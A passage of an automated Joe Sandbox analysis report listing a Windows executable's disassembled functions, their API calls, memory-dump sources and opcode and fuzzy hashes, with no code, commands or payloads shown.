                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: c3f9eec68b9aa097e7a346dc7d65a3eb89df7b1b9f11e5dec18f29aa32891063
                                      • Instruction ID: 0ca080138fa24247cd07d777f1f2b3774d7b9e4b316c7e7db56976855cf4b313
                                      • Opcode Fuzzy Hash: c3f9eec68b9aa097e7a346dc7d65a3eb89df7b1b9f11e5dec18f29aa32891063
                                      • Instruction Fuzzy Hash: BB410F22A08B4281EE148F29E54537A63A1EF49FDCF180175EA5EE7B99DF3CE0808740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A38BD78 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: HandleModule$AddressFreeLibraryProc
                                      • String ID:
                                      • API String ID: 3947729631-0
                                      • Opcode ID: 2a2f1167b8a5567a1982a90cfda6841d20d3bae0c3aade27efee51deb8b54578
                                      • Instruction ID: 530584a7ce49da282be7b36dcecbf1620dec54c0e6b9ea939c7ec5f56393be3a
                                      • Opcode Fuzzy Hash: 2a2f1167b8a5567a1982a90cfda6841d20d3bae0c3aade27efee51deb8b54578
                                      • Instruction Fuzzy Hash: 18419121E1AB4386FB649F15E85017C2AA1AF90B48F5C44BADA0DFB695DF3DF846C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A35129C Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                      • String ID:
                                      • API String ID: 680105476-0
                                      • Opcode ID: ba0e9ec32f9d425c922e86707f850c9359ff9466c7c00b2dd6f3e6a55f5680d3
                                      • Instruction ID: 1f187b4edcd72e05140205b65d8c887d4d414cde34ce28198ef2f940abab3a8f
                                      • Opcode Fuzzy Hash: ba0e9ec32f9d425c922e86707f850c9359ff9466c7c00b2dd6f3e6a55f5680d3
                                      • Instruction Fuzzy Hash: BF21A122A0924185EA14AA95E4102796390EF08BF8F6C0B70EE3DE7BD1EE7CE0518340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3911CC Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID:
                                      • API String ID: 3215553584-0
                                      • Opcode ID: 1ba0ab62ba35dd53ebd3373b140bbd3b037d016492b4c350d3702476c2c82e75
                                      • Instruction ID: 8b46ca9a58f2cbbf71c690f40e15d1da207afacff59d820cb11e031324015ea5
                                      • Opcode Fuzzy Hash: 1ba0ab62ba35dd53ebd3373b140bbd3b037d016492b4c350d3702476c2c82e75
                                      • Instruction Fuzzy Hash: 5B11492291D7878AE764AF50F58063962A5FF40388F5D05B5EA8DF7796DF2CE8008700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A37FBE8 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF65A37F024: GetDlgItem.USER32 ref: 00007FF65A37F063
                                        • Part of subcall function 00007FF65A37F024: ShowWindow.USER32 ref: 00007FF65A37F089
                                        • Part of subcall function 00007FF65A37F024: IsDlgButtonChecked.USER32 ref: 00007FF65A37F09E
                                        • Part of subcall function 00007FF65A37F024: IsDlgButtonChecked.USER32 ref: 00007FF65A37F0B6
                                        • Part of subcall function 00007FF65A37F024: IsDlgButtonChecked.USER32 ref: 00007FF65A37F0D7
                                        • Part of subcall function 00007FF65A37F024: IsDlgButtonChecked.USER32 ref: 00007FF65A37F0F3
                                        • Part of subcall function 00007FF65A37F024: IsDlgButtonChecked.USER32 ref: 00007FF65A37F136
                                        • Part of subcall function 00007FF65A37F024: IsDlgButtonChecked.USER32 ref: 00007FF65A37F154
                                        • Part of subcall function 00007FF65A37F024: IsDlgButtonChecked.USER32 ref: 00007FF65A37F168
                                        • Part of subcall function 00007FF65A37F024: IsDlgButtonChecked.USER32 ref: 00007FF65A37F192
                                        • Part of subcall function 00007FF65A37F024: IsDlgButtonChecked.USER32 ref: 00007FF65A37F1AA
                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A37FC83
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ButtonChecked$ItemShowWindow_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 4003826521-0
                                      • Opcode ID: c82d22960263f5080fbf5d7fa9fd557b002d60d02d52c0d7f6911a267ba6a1b0
                                      • Instruction ID: 4a50f20ac001444a510884731f5a5524e672b5d7a8a4dbecdd54c375d3a9767a
                                      • Opcode Fuzzy Hash: c82d22960263f5080fbf5d7fa9fd557b002d60d02d52c0d7f6911a267ba6a1b0
                                      • Instruction Fuzzy Hash: 65010862E1868682FD109764E44636D6351FF89798F141331EB9CD6BC6DE2CD181C600
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A353AD8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: c25d9a2942aeea5ec892b1c1f6dc86836f60874112994e92993b745fecf7f191
                                      • Instruction ID: 3613f16bcc0331573dfb789bb0f1cb5ca9de78d28d780e3cad9764d7092e489a
                                      • Opcode Fuzzy Hash: c25d9a2942aeea5ec892b1c1f6dc86836f60874112994e92993b745fecf7f191
                                      • Instruction Fuzzy Hash: 1C01C4A2E1868242EA149B28F4512297361FF897A8F445271EA9CE7AA5EF3CD1408704
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3814D8 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF65A381584: GetModuleHandleW.KERNEL32(?,?,?,00007FF65A3814F3,?,?,?,00007FF65A3818AA), ref: 00007FF65A3815AB
                                      • DloadProtectSection.DELAYIMP ref: 00007FF65A381549
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: DloadHandleModuleProtectSection
                                      • String ID:
                                      • API String ID: 2883838935-0
                                      • Opcode ID: 5d635646d0b38b69c8413dcc35f979929b883fe76a3a9121299be0c3cf3c6897
                                      • Instruction ID: 74c00693628e0647ec38a7ab3b387abb54ab7632c50b96164614d7b1352725d3
                                      • Opcode Fuzzy Hash: 5d635646d0b38b69c8413dcc35f979929b883fe76a3a9121299be0c3cf3c6897
                                      • Instruction Fuzzy Hash: CF11DB61E09A0B85FB51DF16E8413B02791AF8434CF1C05B6C90EE72A5EF3CA5958710
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A38F984 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 65d65be094b720022a4c613e05cd8daa3805a7558d9a012189656855d83645cd
                                      • Instruction ID: 9a1d099745c3b44b2cd69649a8042e68a5bbb8c2f3f2bfbfb124cd6f36889929
                                      • Opcode Fuzzy Hash: 65d65be094b720022a4c613e05cd8daa3805a7558d9a012189656855d83645cd
                                      • Instruction Fuzzy Hash: DDF0BE50B0F60752FE956B669A127B852806F98B8CF4C44B1CD0FE63D3FE2CF8818220
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A363E88 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF65A36407C: FindFirstFileW.KERNELBASE ref: 00007FF65A3640CB
                                        • Part of subcall function 00007FF65A36407C: FindFirstFileW.KERNELBASE ref: 00007FF65A36411E
                                        • Part of subcall function 00007FF65A36407C: GetLastError.KERNEL32 ref: 00007FF65A36416F
                                      • FindClose.KERNELBASE(?,?,00000000,00007FF65A370791), ref: 00007FF65A363EBD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Find$FileFirst$CloseErrorLast
                                      • String ID:
                                      • API String ID: 1464966427-0
                                      • Opcode ID: 3db1f706a341b632f8dfa3ea15531839b7ab568833e068a27522bd2dc9fc7792
                                      • Instruction ID: 44fc9d82b2af519eefe3457cfbbd4a32a12f7e817390880fbc5ef017c8e5c810
                                      • Opcode Fuzzy Hash: 3db1f706a341b632f8dfa3ea15531839b7ab568833e068a27522bd2dc9fc7792
                                      • Instruction Fuzzy Hash: 54F0C26290C28185EA509B75A50527927609F0ABBCF2C13B4EA3ED73DBCE29D494C750
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A362090 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF65A362036), ref: 00007FF65A3620B6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ChangeCloseFindNotification
                                      • String ID:
                                      • API String ID: 2591292051-0
                                      • Opcode ID: 88ac200104c8a376347706866ba6eb900ce7ebb2d802d1386c93ce6497709a49
                                      • Instruction ID: 170247fd519ef46677fa8a8939e94743be06043a8df98b04dee0629bd4757086
                                      • Opcode Fuzzy Hash: 88ac200104c8a376347706866ba6eb900ce7ebb2d802d1386c93ce6497709a49
                                      • Instruction Fuzzy Hash: 36F08C22E08A4299FB248B60E4402796660EF15B7CF4E53B5D67CC66D4EE28D895C310
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A38D8CC Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 2826fc88380e59435e692d83d50ce6089ce9b14572d7d031222529168f4ecb4e
                                      • Instruction ID: 2b194c0beb8733f9f898270d27ef70c684bd4c705463ecb862d81dc2807a58f3
                                      • Opcode Fuzzy Hash: 2826fc88380e59435e692d83d50ce6089ce9b14572d7d031222529168f4ecb4e
                                      • Instruction Fuzzy Hash: C4F01C10F0F24785FF956BB259112B952905F947E8F4C46B0DD6EE62C1EE2CE9818220
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3626FC Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: File
                                      • String ID:
                                      • API String ID: 749574446-0
                                      • Opcode ID: 565d15643e4f128e618b680bb6b12741a5b1e404c2efc63b883caeba7534f588
                                      • Instruction ID: f6b3b948f463389cb3e0ddbf37743dc17200ff759caefae7b5002e055295ff17
                                      • Opcode Fuzzy Hash: 565d15643e4f128e618b680bb6b12741a5b1e404c2efc63b883caeba7534f588
                                      • Instruction Fuzzy Hash: 05E0C252F2055582FF20AF7AC841AB91320EF8CF88B4C10B0CE0CD7322CE28C4958700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A362450 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: FileType
                                      • String ID:
                                      • API String ID: 3081899298-0
                                      • Opcode ID: 03da3826baee9e3889fc773b2886221d394f3e810eac95c36ba5225e1f499163
                                      • Instruction ID: 24797aa84cdcdc8d4b7495c0b4f9e375509fb8ca88fd3dcd786550a4ddd92ae2
                                      • Opcode Fuzzy Hash: 03da3826baee9e3889fc773b2886221d394f3e810eac95c36ba5225e1f499163
                                      • Instruction Fuzzy Hash: 01D01216D09841D2DD1097799C5303C1350AF9273DFA807B0D67EE27E1CE1D94969310
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 00007FF65A35C300 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 754fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                      • API String ID: 2659423929-3508440684
                                      • Opcode ID: d6048e4671e9a0492a16f8b45c177de304acdfbade6685641185a67b0a4ca0b0
                                      • Instruction ID: 6a17431f573b8bccd630016bc5838f7b17efd1bb3cabc34969079516194371a9
                                      • Opcode Fuzzy Hash: d6048e4671e9a0492a16f8b45c177de304acdfbade6685641185a67b0a4ca0b0
                                      • Instruction Fuzzy Hash: AC62C062F0968285FB00DB79D4452AD2761EF897ACF584271DA2DE7AEADF3CD185C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36F100 Relevance: 43.2, APIs: 22, Strings: 2, Instructions: 1205COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                      • String ID: %ls$%s: %s
                                      • API String ID: 2539828978-2259941744
                                      • Opcode ID: ec353a941498cb09e5f235a3d7af6150cb1ca2ce858efb67fcdeeb8d51090ce8
                                      • Instruction ID: 08289ef9a6305ffde25cb0cca7bfc626e046c19e27a204eb404b71e99d89e9ff
                                      • Opcode Fuzzy Hash: ec353a941498cb09e5f235a3d7af6150cb1ca2ce858efb67fcdeeb8d51090ce8
                                      • Instruction Fuzzy Hash: E0B2DA62E1968382EA109B25E4451BE6361FFCA798F184376E79DE3BD6DF6CD240C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3924D0 Relevance: 22.3, APIs: 8, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfomemcpy_s
                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 1759834784-2761157908
                                      • Opcode ID: f4511a10a764153de8bd46bbc9a62ab6f98d2375fe8a04f030b037aba6a1eadf
                                      • Instruction ID: 3dc1ebe071814ea4a857b371c3f28d726957b3ddabb1e6d8103f2291d6050ec4
                                      • Opcode Fuzzy Hash: f4511a10a764153de8bd46bbc9a62ab6f98d2375fe8a04f030b037aba6a1eadf
                                      • Instruction Fuzzy Hash: 3CB2E7B2A086828FE7658E69D6406FD37A5FF4478CF585179DA0AF7B84DF38E5048B00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A361A00 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 375fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
